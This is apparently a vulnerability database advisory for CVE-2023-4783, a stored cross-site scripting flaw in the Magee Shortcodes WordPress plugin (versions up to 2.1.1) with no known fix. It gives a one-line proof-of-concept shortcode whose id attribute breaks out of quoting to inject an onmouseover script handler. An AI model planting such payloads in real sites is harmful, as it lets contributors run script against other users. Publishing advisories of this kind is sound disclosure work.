Magee Shortcodes <= 2.1.1 – Contributor+ Stored XSS via shortcode | CVE 2023-4783 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

Proof of Concept

[ms_alert icon="fa-exclamation-circle" background_color="#ffcc00" text_color="#ffffff" border_width="0" border_radius="0" box_shadow="no" dismissable="yes" class="" id='" onmouseover="alert(/XSS/)"']Warning! Better check yourself, you're not looking too good.[/ms_alert]

Affects Plugins

magee-shortcodes

No known fix

References

CVE

URL

https://research.cleantalk.org/cve-2023-4783/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://blog.cleantalk.org

Verified

Yes

WPVDB ID

02928db8-ceb3-471a-b626-ca661d073e4f

Timeline

Publicly Published

2023-09-21 (about 7 months ago)

Added

2023-09-21 (about 7 months ago)

Last Updated

2024-02-12 (about 3 months ago)

Other

Published

Title

Published

2016-08-02

Title

Uji Countdown <= 2.0.6 - Cross-Site Scripting (XSS)

Published

2014-08-01

Title

EZPZ One Click Backup <= 12.03.10 - Cross-Site Scripting (XSS)

Published

2015-05-25

Title

Anti-Malware & Brute-Force Security by ELI <= 4.15.22 - Stored XSS

Published

2023-04-04

Title

Sp*tify Play Button for WordPress < 2.08 - Admin+ Stored XSS

Published

2023-10-24

Title

Nexter Extension < 2.0.4 - Reflected XSS